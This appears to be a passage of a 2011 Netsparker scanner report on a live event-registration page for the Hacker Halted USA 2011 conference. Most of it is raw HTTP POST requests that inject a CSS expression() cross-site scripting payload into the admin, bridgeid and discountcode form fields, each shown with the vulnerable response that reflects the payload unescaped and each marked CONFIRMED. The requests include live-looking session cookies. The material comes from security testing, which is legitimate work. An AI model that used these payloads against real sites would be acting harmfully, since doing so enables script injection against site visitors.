y POST 0 -----------------------------7db13e117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=bd133c1b51374e4385b8fdf1d6613c22
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=ii40gs129s6478gup6gk9mdt63
Content-Length: 1328
Accept-Encoding: gzip, deflate

--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="action"

submit
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="eventid"

19301
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="categoryid"

65410
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="language"

eng
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="reference"

3
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="eb"

3
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="admin"

" stYle="x:expre/**/ssion(netsparker(9))
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="bridgeid"

3
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="discountcode"

3
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="selectcategoryid"

65410
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="x"

0
--bd133c1b51374e4385b8fdf1d6613c22
Content-Disposition: form-data; name="y"

0
-----------------------------7db13e117a156e--
--bd133c1b51374e4385b8fdf1d6613c22--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:31:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=gq5mup6123rur960auk68p4310; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3096
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST " stYle="x:expre/**/ssion(alert(9))
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410
x POST 0
y POST 0 -----------------------------7db13e117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=fb53b708fb414fdb9f8c2a6add390f02
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=m72lbci0pk8480a4akstpp1io6
Content-Length: 1329
Accept-Encoding: gzip, deflate

--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="action"

submit
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="eventid"

19301
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="categoryid"

65410
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="language"

eng
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="reference"

3
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="eb"

3
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="admin"

-1
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="bridgeid"

" stYle="x:expre/**/ssion(netsparker(9))
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="discountcode"

3
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="selectcategoryid"

65410
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="x"

0
--fb53b708fb414fdb9f8c2a6add390f02
Content-Disposition: form-data; name="y"

0
-----------------------------7db13e117a156e--
--fb53b708fb414fdb9f8c2a6add390f02--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:31:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=4o2iijvhcbsffocm988ed71tq5; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3096
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><!--Array( [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST " stYle="x:expre/**/ssion(alert(9))
selectcategoryid POST 65410
x POST 0
y POST 0 -----------------------------7db13e117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=308190c6adf643609909f21416c705e6
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=7j1fodimv1t0gmgi8kkj87ou54
Content-Length: 1329
Accept-Encoding: gzip, deflate

--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="action"

submit
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="eventid"

19301
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="categoryid"

65410
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="language"

eng
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="reference"

3
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="eb"

3
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="admin"

-1
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="bridgeid"

3
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="discountcode"

" stYle="x:expre/**/ssion(netsparker(9))
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="selectcategoryid"

65410
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="x"

0
--308190c6adf643609909f21416c705e6
Content-Disposition: form-data; name="y"

0
-----------------------------7db13e117a156e--
--308190c6adf643609909f21416c705e6--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:32:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=tnhe2b56l71gv1o3m773mh7k92; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3097
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" 